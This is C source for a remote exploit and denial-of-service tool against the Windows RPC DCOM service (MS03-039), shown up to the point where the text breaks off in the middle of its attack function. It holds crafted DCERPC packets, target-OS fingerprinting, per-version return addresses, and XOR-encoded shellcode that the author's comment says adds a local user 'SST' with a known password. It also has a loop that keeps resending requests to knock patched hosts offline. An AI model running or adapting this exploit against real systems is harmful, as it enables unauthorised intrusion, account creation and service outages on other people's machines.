MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)
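/*
 * MS Windows RPC DCOM (RPC2) universal exploit (MS03-039) & remote DoS (RPC3)
 *
 * Must be used with the associated shellcode file "bshell2" in the working
 * directory: attack() reads it and splices it into the request at offset 0x71.
 *
 * Behaviour as published by the author:
 *   - unpatched (MS03-039) host: the request is meant to reach code execution
 *   - patched host: the endless resend loop in attack() acts as a DoS (RPC3)
 *
 * Credits carried over from the original listing: vulnerability found by
 * NSFOCUS; original RPCDCOM2 code by FlashSky (xfocus.org); modification and
 * shellcode by karlss0n.
 *
 * Review notes for this revision (wire payloads are unchanged):
 *   - attack() no longer dereferences a NULL FILE* when "bshell2" is missing,
 *     no longer overflows rawData[] for a shellcode longer than it can hold,
 *     and no longer mutates the global request2[] on every call (the old code
 *     accumulated the length adjustment across calls and threads).
 *   - version() no longer fingerprints from a failed recv() and leaves the
 *     socket to its caller (the old code closed it on some paths only, and the
 *     caller closed it again).
 *   - main() no longer reads argv[3..5] when only one argument was given, and
 *     scan mode passes each address to its thread instead of sharing one
 *     global buffer that the main loop kept overwriting.
 *   - fp1 is never opened by this program; log lines fall back to stdout.
 */
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <winbase.h>

/* Optional log sink for scan mode. Never opened here; see log_target(). */
FILE *fp1;

/* Fixed layout of the rawData buffer, as used by the original offsets. */
enum {
    RAWDATA_LEN   = 1036,   /* size of the marshalled UNC body sent on the wire */
    SHELLCODE_OFF = 0x71,   /* where the bshell2 contents are spliced in */
    HEAP_OFF      = 0x1e,   /* heap address slot, relative to SHELLCODE_OFF */
    SIZE_OFF      = 0x62,   /* WORD: shellcode length */
    JMP_OFF       = 0x22a,  /* DWORD: jmp address from target_os[] */
    SEH_OFF       = 0x22e,  /* DWORD: SEH address from target_os[] */
    RPC_PORT      = 135,
    PROBE_TIMEOUT = 6       /* seconds to wait for each fingerprint reply */
};

/* DCERPC bind to the ISystemActivator interface (sent before the exploit request). */
unsigned char bindstr[] = {
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};

/*
 * DCERPC request carrying the RemoteActivation call. Its fragment/stub length
 * fields assume a 12-byte UNC body; attack() grows them by RAWDATA_LEN - 0xc at
 * the offsets listed in len_fixups[]. Layout (MEOW/OBJREF structure) as in the
 * original XFocus code.
 */
unsigned char request1[] = {
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,
    0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,
    0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,
    0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,
    0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,
    0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,
    0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,
    0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,
    0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,
    0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,
    0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,
    0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,
    0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,
    0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,
    0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,
    0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,
    0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,
    0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,
    0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,
    0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,
    0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,
    0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,
    0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,
    0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,
    0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,
    0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,
    0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,
    0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,
    0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,
    0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,
    0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,
    0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,
    0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,
    0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,
    0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,
    0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,
    0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,
    0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,
    0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00
};

/*
 * Marshalled prefix of the UNC string: two DWORD counts (0x20, grown by
 * RAWDATA_LEN/2 in attack()) followed by "\\" in UTF-16LE. attack() works on a
 * copy; this template stays constant.
 */
unsigned char request2[] = {
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,
    0x00,0x00,0x5C,0x00,0x5C,0x00
};

/* UTF-16LE tail of the path: "FC$F123456", a run of '1's, ".doc", NUL. */
unsigned char request3[] = {
    0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
    0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00,
    0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
    0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
    0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00
};

/* Trailing marshalled structure that closes the request. */
unsigned char request4[] = {
    0x01,0x10,
    0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00,
    0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C,
    0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

/*
 * XOR `length` bytes of buf, starting at `offset`, with `mask`.
 * attack() uses it to encode the spliced shellcode with the 0x99 key that the
 * decoder stub in rawData1 expects. No bounds checking: the caller guarantees
 * offset + length <= the buffer size.
 */
void XOR(unsigned char *buf, int offset, int length, unsigned char mask)
{
    for (int i = offset; i < offset + length; i++)
        buf[i] ^= mask;
}

/*
 * String checksum: for every byte, rotate the running 32-bit value right by 13
 * and add the (plain char, possibly signed) byte. Only referenced from
 * debugging code in the original listing; kept for compatibility.
 */
DWORD GETSTRCS(char *buf)
{
    uint32_t cs = 0;
    size_t n = strlen(buf);

    for (size_t i = 0; i < n; i++) {
        cs = (cs >> 13) | (cs << 19);   /* ROR 13 — same as 13 single-bit rotates */
        cs += buf[i];
    }
    return (DWORD)cs;
}

/*
 * Per-target addresses patched into rawData: SEH handler, jmp stub, heap base.
 * Index 0 is WinXP, index 1 is Win2K; attack() maps version()'s result onto it.
 * `v` is the unused trailing instance from the original declaration.
 */
struct {
    DWORD seh;
    DWORD jmp;
    DWORD heap;
    char target[200];
} target_os[] = {
    { 0x005Bfd2c, 0x00081eeb, 0x00180000, "WinXP" },
    { 0x0095fd3c, 0x00081eeb, 0x00170000, "Win2K" }
}, v;

/*
 * Template for the UNC body. Starts with "localhost\C$\X" in UTF-16LE, then a
 * small decoder stub; from byte 0x71 on the embedded shellcode is replaced by
 * the contents of "bshell2" in attack(). Author comments are kept below.
 */
unsigned char rawData1[] =
    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"
    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"
    /* SHELLCODE from SAM, thanks! Adds user SST, password 557. */
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
    "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
    "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
    "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
    "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
    "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
    "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
    "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
    "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
    "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
    "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
    "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
    "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
    "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
    "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
    "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
    "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
    "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
    "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
    "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"
    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90"
    /* original had a further "\x90"x8 row commented out here */
    "\x77\xe0\x43\x00\x00\x10\x5c\x00"
    "\xeb\x1e\x01\x00"   /* for CN SP3/SP4 + MS03-026 (author's note) */
    "\x4C\x14\xec\x77"   /* top SEH for CN W2K SP4; must match the target OS (author's note).
                            attack() overwrites the jmp/SEH slots at 0x22a/0x22e anyway. */
    /* Fill bytes so that sizeof(UNC) > 0x400 (0x80*8); see the author's article
       "Utilization of released heap structure and exploit of universal Heap
       overflow in windows". */
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
    "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
    "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
    "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
    "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
    "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
    "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
    "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
    "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
    "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
    "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
    "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
    "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
    "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
    "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
    "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
    "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
    "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
    "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
    "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
    "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
    "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
    "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
    "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
    "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"
    "\x04\x04\x00\x70\x00\x04\x40"
    "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"
    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";

/* Store a DWORD at an arbitrary (possibly unaligned) offset in host byte order. */
static void put32(unsigned char *p, DWORD value)
{
    memcpy(p, &value, sizeof value);
}

/* Store a WORD at an arbitrary (possibly unaligned) offset in host byte order. */
static void put16(unsigned char *p, WORD value)
{
    memcpy(p, &value, sizeof value);
}

/* Add `delta` to the DWORD stored at p (host byte order, alignment-safe). */
static void add32(unsigned char *p, DWORD delta)
{
    DWORD value;
    memcpy(&value, p, sizeof value);
    value += delta;
    memcpy(p, &value, sizeof value);
}

/* Wait until `sock` is readable or `secs` seconds pass; true when readable. */
static bool wait_readable(SOCKET sock, long secs)
{
    fd_set fds;
    struct timeval tv;

    FD_ZERO(&fds);
    FD_SET(sock, &fds);
    tv.tv_sec = secs;
    tv.tv_usec = 0;
    return select((int)sock + 1, &fds, NULL, NULL, &tv) > 0;
}

/*
 * Scan-mode log line "<os> <ip>". fp1 is never opened by this program, so the
 * line goes to stdout unless some caller has assigned fp1 (the original code
 * dereferenced the NULL FILE*).
 */
static void log_target(const char *os, const char *ip)
{
    FILE *out = fp1 ? fp1 : stdout;
    fprintf(out, "%s %s\n", os, ip);
    fflush(out);
}

/*
 * Fingerprint the target OS over an already-connected RPC socket.
 *
 * Sends a multi-interface bind (peer0_0) and then a small RemoteActivation
 * request (peer0_1); the size of the second reply classifies the host, exactly
 * as the original listing did ("un poco de ettercap...").
 *
 * `ip` is unused and kept only for signature compatibility.
 *
 * Returns  1  WinXP (second reply is 32 bytes),
 *          0  Win2K (any other non-empty reply; NT4 was never added),
 *         -1  unknown: a send failed, a reply timed out (PROBE_TIMEOUT s) or
 *             the peer closed the connection.
 *
 * The socket is NOT closed here; the caller owns it.
 */
int version(char ip[16], int sock)
{
    static const unsigned char peer0_0[] = {
        0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
        0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
        0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
        0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
        0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
        0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
        0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
        0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
        0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
        0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
        0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
        0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00
    };
    static const unsigned char peer0_1[] = {
        0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
        0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
        0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
        0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
        0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
        0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
        0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
        0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00
    };
    /* The original also carried a commented-out, unused Win2K interface-list
       fingerprint (win2kvuln[]); it is not part of the decision below. */
    unsigned char buf[1024];
    int received;

    (void)ip;

    if (send(sock, (const char *)peer0_0, sizeof(peer0_0), 0) == SOCKET_ERROR)
        return -1;
    if (!wait_readable((SOCKET)sock, PROBE_TIMEOUT))
        return -1;
    memset(buf, 0, sizeof(buf));
    received = recv(sock, (char *)buf, sizeof(buf), 0);
    if (received <= 0)
        return -1;   /* no bind reply: nothing to fingerprint */

    if (send(sock, (const char *)peer0_1, sizeof(peer0_1), 0) == SOCKET_ERROR)
        return -1;
    if (!wait_readable((SOCKET)sock, PROBE_TIMEOUT))
        return -1;
    memset(buf, 0, sizeof(buf));
    received = recv(sock, (char *)buf, sizeof(buf), 0);
    if (received <= 0)
        return -1;   /* the original classified a failed recv() as Win2K */

    /* A 32-byte second reply is the XP signature used by the original. */
    return (received == 32) ? 1 : 0;
}

/*
 * Build and deliver the MS03-039 request to `ip1` (TCP/135).
 *
 *   1. connect and fingerprint the OS with version() to choose target_os[]
 *   2. read "bshell2", splice it into rawData at SHELLCODE_OFF, store the heap
 *      address at SHELLCODE_OFF + HEAP_OFF, XOR-encode the region with 0x99
 *   3. patch jmp/SEH (JMP_OFF/SEH_OFF) and the shellcode length (SIZE_OFF)
 *   4. assemble request1 + request2 + rawData + request3 + request4 and grow
 *      the eight length fields request1 carries at fixed offsets
 *   5. if `atack`: reconnect, bind, and resend the request until the peer
 *      refuses a send (on a patched host this loop is the RPC3 DoS);
 *      otherwise only log "<os> <ip>" (scan mode).
 *
 * Returns 1 when the request was built (and, in attack mode, delivered until
 * the peer rejected a send); 0 on any local failure: socket/connect error,
 * missing shellcode file, or a shellcode too large for the buffer.
 */
int attack(char *ip1, bool atack)
{
    static const size_t len_fixups[] = { 0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0, 0x18c };
    unsigned char rawData[RAWDATA_LEN];
    unsigned char shellcode[1024];
    unsigned char req2[sizeof(request2)];
    unsigned char buf1[1000];
    unsigned char buf2[sizeof(request1) + sizeof(request2) + RAWDATA_LEN +
                       sizeof(request3) + sizeof(request4)];
    char ip[200];
    SOCKADDR_IN addr_in;
    SOCKET sock;
    FILE *fp;
    size_t sz, pos, copy;
    int vers;

    if (ip1 == NULL)
        return 0;
    snprintf(ip, sizeof ip, "%s", ip1);   /* the original strcpy() had no bound */
    printf("%s\n", ip);

    memset(&addr_in, 0, sizeof addr_in);
    addr_in.sin_family = AF_INET;
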